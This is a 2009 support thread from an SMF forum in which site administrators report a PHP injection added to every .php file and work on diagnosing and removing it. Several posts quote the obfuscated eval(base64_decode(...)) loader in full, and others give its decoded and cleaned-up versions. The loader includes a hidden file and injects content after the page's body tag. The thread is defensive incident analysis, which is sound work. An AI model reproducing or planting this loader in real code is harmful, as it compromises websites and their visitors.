News:

Join the Facebook Fan Page.

Main Menu

Is this a hack?

Started by Xavi-Nena, February 07, 2009, 10:16:55 PM

Previous topic - Next topic

Xavi-Nena

I have code at the top of some of my files im guessing is a hack?

<? /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9hbnlwdXBjby9wdWJsaWNfaHRtbC9hLWNvcnNvdGFsay9iYi9UaGVtZXMvc2NyaWJibGVzMTEvaW1hZ2VzL2ltZy9pbWcvY29wcGVyLnBocCcpKXtpbmNsdWRlX29uY2UoJy9ob21lL2FueXB1cGNvL3B1YmxpY19odG1sL2EtY29yc290YWxrL2JiL1RoZW1lcy9zY3JpYmJsZXMxMS9pbWFnZXMvaW1nL2ltZy9jb3BwZXIucGhwJyk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmIWZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7aWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ZnVuY3Rpb24gZ3pkZWNvZGUoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCl7JFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2Qj1vcmQoc3Vic3RyKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsMywxKSk7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MT0xMDskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxPTA7aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY0KXskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxPXVucGFjaygndicsc3Vic3RyKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsMTAsMikpOyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMVsxXTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKz0yKyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE7fWlmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImOCl7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MT1zdHJwb3MoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCxjaHIoMCksJFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSkrMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiYxNil7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MT1zdHJwb3MoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCxjaHIoMCksJFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSkrMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiYyKXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKz0yO30kUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPWd6aW5mbGF0ZShzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSk7aWYoJFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mz09PUZBTFNFKXskUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPSRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4Njg7fXJldHVybiAkUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzO319ZnVuY3Rpb24gZGdvYmgoJFJEQTNFNjE0MTRFNTBBRUU5NjgxMzJGMDNEMjY1RTBDRil7SGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7JFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MD1nemRlY29kZSgkUkRBM0U2MTQxNEU1MEFFRTk2ODEzMkYwM0QyNjVFMENGKTtpZihwcmVnX21hdGNoKCcvXDxib2R5L3NpJywkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwKSl7cmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPGJvZHlbXlw+XSpcPikvc2knLCckMScuZ21sKCksJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MCk7fWVsc2V7cmV0dXJuIGdtbCgpLiRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTA7fX1vYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>

Xavi-Nena

nevermind sorry i figured it out that it was.

MrMike

Yep, it decodes to this...and it contains more obfuscated strings. It's a hack.

if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home/anypupco/public_html/a-corsotalk/bb/Themes/scribbles11/images/img/img/copper.php')){include_once('/home/anypupco/public_html/a-corsotalk/bb/Themes/scribbles11/images/img/img/copper.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($R20FD65E9C7406034FADC682F06732868){$R6B6E98CDE8B33087A33E4D3A497BD86B=ord(substr($R20FD65E9C7406034FADC682F06732868,3,1));$R60169CD1C47B7A7A85AB44F884635E41=10;$R0D54236DA20594EC13FC81B209733931=0;if($R6B6E98CDE8B33087A33E4D3A497BD86B&4){$R0D54236DA20594EC13FC81B209733931=unpack('v',substr($R20FD65E9C7406034FADC682F06732868,10,2));$R0D54236DA20594EC13FC81B209733931=$R0D54236DA20594EC13FC81B209733931[1];$R60169CD1C47B7A7A85AB44F884635E41+=2+$R0D54236DA20594EC13FC81B209733931;}if($R6B6E98CDE8B33087A33E4D3A497BD86B& 8) {$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&16){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&2){$R60169CD1C47B7A7A85AB44F884635E41+=2;}$RC4A5B5E310ED4C323E04D72AFAE39F53=gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41));if($RC4A5B5E310ED4C323E04D72AFAE39F53===FALSE){$RC4A5B5E310ED4C323E04D72AFAE39F53=$R20FD65E9C7406034FADC682F06732868;}return $RC4A5B5E310ED4C323E04D72AFAE39F53;}}function dgobh($RDA3E61414E50AEE968132F03D265E0CF){Header('Content-Encoding: none');$R3E33E017CD76B9B7E6C7364FB91E2E90=gzdecode($RDA3E61414E50AEE968132F03D265E0CF);if(preg_match('/<body/si',$R3E33E017CD76B9B7E6C7364FB91E2E90)){return preg_replace('/(<body[^>]*>)/si','$1'.gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90);}else{return gml().$R3E33E017CD76B9B7E6C7364FB91E2E90;}}ob_start('dgobh');}}}

Xavi-Nena

any idea how to figure out how this is happening?

MrMike

It looks like they put the file "copper.php" on the site and are calling it through an include:

home/anypupco/public_html/a-corsotalk/bb/Themes/scribbles11/images/img/img/copper.php

There's a lot off GZ-encoded stuff to further hide the programming statements. It could be almost anything, a malware dropper, an extra ad displayer, a backdoor, a botnot includer file, etc etc.

Xavi-Nena

ugh thanks...

lets hope it stops. considering i do not even have that file in my themes directory anymore...

MrMike

Quote from: NenaGb on February 08, 2009, 12:18:12 AM
ugh thanks...

lets hope it stops. considering i do not even have that file in my themes directory anymore...
More importantly, you want to find out how your site was compromised initially or it'll probably be exploited again. They may also have installed additional code on your site that you'll want to find.

If you're running on a linux box, this command will list the newest files anywhere on the system:  ls -a -l -t -R | more

Xavi-Nena

im not sure exactly if i am or not or how to run that code...would you mind explaining? thanks so much.

Fustrate

I got bored... doubt it'll be very helpful without the copper.php file, but here it is all cleaned up.

if(function_exists('ob_start') && !isset($GLOBALS['sh_no'])){
$GLOBALS['sh_no'] = 1;

if(file_exists('/home/anypupco/public_html/a-corsotalk/bb/Themes/scribbles11/images/img/img/copper.php')){
include_once('/home/anypupco/public_html/a-corsotalk/bb/Themes/scribbles11/images/img/img/copper.php');

if(function_exists('gml') && !function_exists('dgobh')){
if(!function_exists('gzdecode')){
function gzdecode($var1){
$var2 = ord(substr($var1, 3, 1));
$var3 = 10;
$var4 = 0;

if($var2&4){
$var4 = unpack('v',substr($var1, 10, 2));
$var4 = $var4[1];
$var3 += 2 + $var4;
}

if($var2&8)
$var3 = strpos($var1, chr(0), $var3) + 1;

if($var2&16)
$var3 = strpos($var1, chr(0), $var3) + 1;

if($var2&2)
$var3 += 2;

$var5 = gzinflate(substr($var1, $var3));

if($var5 === FALSE)
$var5 = $var1;

return $var5;
}
}

function dgobh($var6){
Header('Content-Encoding: none');
$var7 = gzdecode($var6);
if(preg_match('/<body/si', $var7))
return preg_replace('/(<body[^>]*>)/si', '$1' . gml(), $var7);
else
return gml() . $var7;
}

ob_start('dgobh');
}
}
}
Steven Hoffman
Former Team Member, 2009-2012

Xavi-Nena

forgive my ignorance but what exactly is this cleaned up?  O:)

aldo

We would need to see copper.php in order to know what it does.

Fustrate

Well it's that big chunk of code from MrMike's post, with the really long variables replaced with $var1 - $var7, and put in a form that actually legible.

The only thing I can discern from it is that it adds whatever gml() does right after the <body> tag. Without copper.php, we don't know what gml() puts in there.
Steven Hoffman
Former Team Member, 2009-2012

Totosfo

Hi all,

I had the same issue - the code was added to ALL .php files on my server. If anyone is interested in the copper.php file, I can provide it, just let me know where to mail it.

Best,

Thomas
Cheers,

Thomas

Fustrate

Steven Hoffman
Former Team Member, 2009-2012

cafecommk

Can someone tell me how did you resolve this issue. i do not have a copper.php file but I have this :
/**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS92aXN0aW5hYy9wdWJsaWNfaHRtbC9jYWZlL2ZvcnVtL21hbWJvdHMvZWRpdG9ycy90aW55bWNlL2pzY3JpcHRzL3RpbnlfbWNlL3BsdWdpbnMvbWVkaWEvaW1hZ2VzL3Bhc3RlL2pzY3JpcHRzL2NvcHBlci5waHAnKSl7aW5jbHVkZV9vbmNlKCcvaG9tZS92aXN0aW5hYy9wdWJsaWNfaHRtbC9jYWZlL2ZvcnVtL21hbWJvdHMvZWRpdG9ycy90aW55bWNlL2pzY3JpcHRzL3RpbnlfbWNlL3BsdWdpbnMvbWVkaWEvaW1hZ2VzL3Bhc3RlL2pzY3JpcHRzL2NvcHBlci5waHAnKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbiBnemRlY29kZSgkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4KXskUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCPW9yZChzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwzLDEpKTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPTEwOyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9MDtpZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjQpeyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9dW5wYWNrKCd2JyxzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwxMCwyKSk7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT0kUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxWzFdOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTIrJFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY4KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjE2KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjIpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTI7fSRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9Z3ppbmZsYXRlKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKTtpZigkUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPT09RkFMU0UpeyRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9JFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2ODt9cmV0dXJuICRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM7fX1mdW5jdGlvbiBkZ29iaCgkUkRBM0U2MTQxNEU1MEFFRTk2ODEzMkYwM0QyNjVFMENGKXtIZWFkZXIoJ0NvbnRlbnQtRW5jb2Rpbmc6IG5vbmUnKTskUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwPWd6ZGVjb2RlKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NUUwQ0YpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApKXtyZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8Ym9keVteXD5dKlw+KS9zaScsJyQxJy5nbWwoKSwkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwKTt9ZWxzZXtyZXR1cm4gZ21sKCkuJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MDt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ=='));
and it is in all my php files. even in settings_bak

I appologize for  writing in two posts http://www.simplemachines.org/community/index.php?topic=291664.msg1931245#msg1931245

thank you

Fustrate

#15
you'd probably have to remove it manually from every file, or use a large upgrade like [n3rve] said in the other thread.

And there was no file at /home/vistinac/public_html/cafe/forum/mambots/editors/tinymce/jscripts/tiny_mce/plugins/media/images/paste/jscripts/copper.php? I still haven't been able to find a copy of it to see what this does, but since you said it's not there, we still don't quite know what this does.
Steven Hoffman
Former Team Member, 2009-2012

cafecommk

sorry i did not find a copper.php . I removed all the files not needed and [n3rve] helped on the large upgrade and ....
I just hope it does not make me anymore trouble.

ccondrup

#17
I have recently had my Smf 1.1.8 board hacked. I have recently seen an increase in automatically registered accounts, and a couple of automated spam posts, so I have been monitoring a little closer lately. When suddenly lots of avatars went missing, I knew something was up.

All .php files under /www/ had this line injected at the top of the file:
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS8zL2IvYm14L3d3dy9wbWEvcG1kL3N0eWxlcy9kZWZhdWx0L2ltYWdlcy9zdHlsZS5jc3MucGhwJykpe2luY2x1ZGVfb25jZSgnL2hvbWUvMy9iL2JteC93d3cvcG1hL3BtZC9zdHlsZXMvZGVmYXVsdC9pbWFnZXMvc3R5bGUuY3NzLnBocCcpO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJiFmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe2lmKCFmdW5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlJykpe2Z1bmN0aW9uIGd6ZGVjb2RlKCRkKXskZj1vcmQoc3Vic3RyKCRkLDMsMSkpOyRoPTEwOyRlPTA7aWYoJGYmNCl7JGU9dW5wYWNrKCd2JyxzdWJzdHIoJGQsMTAsMikpOyRlPSRlWzFdOyRoKz0yKyRlO31pZigkZiY4KXskaD1zdHJwb3MoJGQsY2hyKDApLCRoKSsxO31pZigkZiYxNil7JGg9c3RycG9zKCRkLGNocigwKSwkaCkrMTt9aWYoJGYmMil7JGgrPTI7fSR1PWd6aW5mbGF0ZShzdWJzdHIoJGQsJGgpKTtpZigkdT09PUZBTFNFKXskdT0kZDt9cmV0dXJuICR1O319ZnVuY3Rpb24gZGdvYmgoJGIpe0hlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyRjPWd6ZGVjb2RlKCRiKTtpZihwcmVnX21hdGNoKCcvXDxib2R5L3NpJywkYykpe3JldHVybiBwcmVnX3JlcGxhY2UoJy8oXDxib2R5W15cPl0qXD4pL3NpJywnJDEnLmdtbCgpLCRjKTt9ZWxzZXtyZXR1cm4gZ21sKCkuJGM7fX1vYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>
No files with other file extensions were touched, and .php files outside of /www/ were also unharmed.

The above base64 hash decodes to what is in the attached decoded_injection.php
It in turn calls the main hack file, in my case called style.css.php - in my case this was placed in a subdirectory of an outdated phpmyadmin-install, quite possibly their point of entry for the exploit. I guess this file can be named copper.php or whatever in other circumstances.

This style.css.php file was a 170kb file with a huge base64 hash. It decoded to approx 20 new base64 encoded evals. I decoded everything I found and ran it through a code prettyfier, and ended up with a 100kb php file of approx 2000 lines of code. I did a search+replace for some of the function names, but quickly tired and stopped halfway through - the file is just so massive..

Also, if your site is infected, take note of which folder that last mentioned file is in, because in the same folder is where it stores the generated spam files this hack creates. They are files without extensions, names ranging from just "t", "50", to longer names such as "f2219f70f695539a82941423841dc26c". I have attached 3 examples of those final spam files this hack aims to generate.

You can search the style.css.php file for "http:" to quickly find the involved spam domains, which include:
   nomsat23.net nssat3.com wplsat23.net pearch.net gawab.com
After googling gawab.com and the other mentioned callback-urls, I found several domains common forum admins have had trouble with, so I am creating an sql file to add all these domains to my smf bantriggers. Its also attached as spamdomains.sql - remember to replace 15 with the id of the bangroup you want to add these to.

Hope this helps someone. If anyone cares to dig deeper into the code, please update the thread with whatever you find.

busterone

That looks really familiar.  Did you, or do you have a member named Krisbarteo?

If so, you may want to look at this thread-
http://www.simplemachines.org/community/index.php?topic=307717.msg2047539#msg2047539

ccondrup

Wouldn't you know it, I came directly to this thread via a search for the base64 hash in all the files. After I had posted, I looked at the other threads in the forum, so I found out how common this issue was ;)

I have already read the one you linked, and now all my bantriggers are removed and this mod has been installed. Yes, Krisbarteo was present, and a few other suspicious members from same host/ip. So far it has found ~10 registered members that are confirmed spammers. Already love the mod ;)

busterone

I had 4 of them from the same IP range, but not the krisbarteo character. I was lucky, no hack and no damage.  :)

thatguy

I had another site (not SMF) completely destroyed by this exploit. Although all my SMF PHP pages have that line of code in them I am hoping a clean up script I was pointed to will remove all the malicious code. I'll find out I suppose. The forum still works though.

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS93YXN0aW4yL3B1YmxpY19odG1sL2UxMDd2NjE2L2UxMDdfaGFuZGxlcnMvdGlueV9tY2UvdGhlbWVzL2FkdmFuY2VkL2ltYWdlcy94cC9fdnRpX2NuZi9zdHlsZS5jc3MucGhwJykpe2luY2x1ZGVfb25jZSgnL2hvbWUvd2FzdGluMi9wdWJsaWNfaHRtbC9lMTA3djYxNi9lMTA3X2hhbmRsZXJzL3RpbnlfbWNlL3RoZW1lcy9hZHZhbmNlZC9pbWFnZXMveHAvX3Z0aV9jbmYvc3R5bGUuY3NzLnBocCcpO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJiFmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe2lmKCFmdW5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlJykpe2Z1bmN0aW9uIGd6ZGVjb2RlKCRkKXskZj1vcmQoc3Vic3RyKCRkLDMsMSkpOyRoPTEwOyRlPTA7aWYoJGYmNCl7JGU9dW5wYWNrKCd2JyxzdWJzdHIoJGQsMTAsMikpOyRlPSRlWzFdOyRoKz0yKyRlO31pZigkZiY4KXskaD1zdHJwb3MoJGQsY2hyKDApLCRoKSsxO31pZigkZiYxNil7JGg9c3RycG9zKCRkLGNocigwKSwkaCkrMTt9aWYoJGYmMil7JGgrPTI7fSR1PWd6aW5mbGF0ZShzdWJzdHIoJGQsJGgpKTtpZigkdT09PUZBTFNFKXskdT0kZDt9cmV0dXJuICR1O319ZnVuY3Rpb24gZGdvYmgoJGIpe0hlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyRjPWd6ZGVjb2RlKCRiKTtpZihwcmVnX21hdGNoKCcvXDxib2R5L3NpJywkYykpe3JldHVybiBwcmVnX3JlcGxhY2UoJy8oXDxib2R5W15cPl0qXD4pL3NpJywnJDEnLmdtbCgpLCRjKTt9ZWxzZXtyZXR1cm4gZ21sKCkuJGM7fX1vYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?> <?php

Very frustrating to see 5 years of fun down the tubes because of a unknown spammer. 5 minutes in alone with the dude is all I am asking for.
The statements above have not been evaluated by the Food and Drug Administration.
These statements are not intended to diagnose, treat, cure or prevent any disease.

ccondrup

I'd like to add that once I got rid of this entirely (I went the manual route) loading my forum (hosted in Norway for Norwegians)  pages went from ~2-3 seconds to 0.1-0.5 sec.. it was immediately noticeable.

thatguy

Quote from: ccondrup on June 10, 2009, 01:29:43 PM
I'd like to add that once I got rid of this entirely (I went the manual route) loading my forum (hosted in Norway for Norwegians)  pages went from ~2-3 seconds to 0.1-0.5 sec.. it was immediately noticeable.

I am very glad it worked for you. I am in the process of changing all my passwords but if this hack goes as deep as I think it does and as deep as mentioned here then changing passwords before the site is deterged is useless.
The statements above have not been evaluated by the Food and Drug Administration.
These statements are not intended to diagnose, treat, cure or prevent any disease.

Fustrate

Steven Hoffman
Former Team Member, 2009-2012

thatguy

I sure did. Followed the directions to a "T". However it wouldn't run, it kept saying it needed to be in the folder where SSI was. Thing is, it was. They where right next to each other, like peas and carrots. I'll take a screen shot tonight when I get home and show you.

Thanks
The statements above have not been evaluated by the Food and Drug Administration.
These statements are not intended to diagnose, treat, cure or prevent any disease.

Fustrate

Try changing the path at the top of the file to the relative path... something like /home/thatguy/public_html/forum/SSI.php and see if that works. If you're not sure, look in Settings.php and see what path $sourcedir uses, and just modify that.
Steven Hoffman
Former Team Member, 2009-2012

thatguy

OK, I'll do that. I really want it to run. Even though I changed all my passwords I don't like having that viral code in there. They could already know my passwords already.

Thank You
The statements above have not been evaluated by the Food and Drug Administration.
These statements are not intended to diagnose, treat, cure or prevent any disease.

thatguy

#28
Thank you for your patience with me on this, these are the pathes in my settings PHP.

# Note: These directories do not have to be changed unless you move things.
$boarddir = '/home/blood13/public_html/Forums';      # The absolute path to the forum's folder. (not just '.'!)
$sourcedir = '/home/blood13/public_html/Forums/Sources';      # Path to the Sources directory.

I changed the path in kb_scan.php to /home/blood/13/public_html/Forums    However, I get this still

Error: Cannot run - please verify you put this in the same place as SMF's index.php and SSI.php files.
The statements above have not been evaluated by the Food and Drug Administration.
These statements are not intended to diagnose, treat, cure or prevent any disease.

Norv

*headscratch*
Certainly look as close as possible to me...
How are the files in this directory chmodded, SSI.php in particular?
To-do lists are for deferral. The more things you write down the later they're done... until you have 100s of lists of things you don't do.

File a security report | Developers' Blog | Bug Tracker


Also known as Norv on D* | Norv N. on G+ | Norv on Github

Norv

Please eventually, make sure you access your forum, log in as admin, then try to access directly in the browser kb_scan.php.
To-do lists are for deferral. The more things you write down the later they're done... until you have 100s of lists of things you don't do.

File a security report | Developers' Blog | Bug Tracker


Also known as Norv on D* | Norv N. on G+ | Norv on Github

thatguy

First of all, thanks for your reply. I'll try that.
The statements above have not been evaluated by the Food and Drug Administration.
These statements are not intended to diagnose, treat, cure or prevent any disease.

thatguy

Quote from: Norv on June 12, 2009, 05:24:35 PM
*headscratch*
Certainly look as close as possible to me...
How are the files in this directory chmodded, SSI.php in particular?

SSI is 755
kb_scan.php is 644

Is that right?
The statements above have not been evaluated by the Food and Drug Administration.
These statements are not intended to diagnose, treat, cure or prevent any disease.

thatguy

Thank you all for the tips. I had another site that was completely wiped out by this exploit however, I wasn't using SMF. That site was not worth cleaning, to much damage. The site i was concerned most with was my forum for veterans. I couldn't get this cleaning script to work so I went in manually and deterged every page manually. 5 years ago something similar happened with another forum of mine and the entire site was lost, thankfully that was not the case this time.
The statements above have not been evaluated by the Food and Drug Administration.
These statements are not intended to diagnose, treat, cure or prevent any disease.

Advertisement: